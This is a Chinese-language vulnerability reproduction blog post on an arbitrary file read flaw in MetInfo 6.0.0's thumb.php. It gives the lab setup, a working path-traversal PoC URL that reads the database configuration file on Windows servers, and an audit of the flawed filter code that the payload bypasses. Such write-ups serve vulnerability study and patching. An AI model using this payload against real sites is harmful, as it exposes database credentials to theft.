[漏洞复现]metinfo6.0.0任意文件读取

环境:

OS:windows server 2016

WEB SERVER:PHPStudy pro

CMS:MetInfo6.0.0

PHP版本:php5.3.29

环境搭建:

下载metinfo6.0.0源码包

地址:MetInfo历史版本与文件

解压源码包并且初始化网站

漏洞点:

/include/thumb.php

POC

/include/thumb.php?dir=http\..\..\config\config_db.php

注意:该POC仅在windows环境中生效

代码审计

打开源码包,找到app/system/include/module/old_thumb.class.php

$dir = str_replace(array('../','./'), '', $_GET['dir']);
​
​
        if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){
            header("Content-type: image/jpeg");
            ob_start();
            readfile($dir);
            ob_flush();
            flush();
            die;
        }

接收到了get提交的参数dir,并且将字符.././进行了替换

if语句中,又将检查字符串的前4个字符是否等于http且是否包含./字符,如果是,则返回false

所以我们在payload中使用..\字符串用来避开检测,这也就是为什么只能在windows服务器生效的原因

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值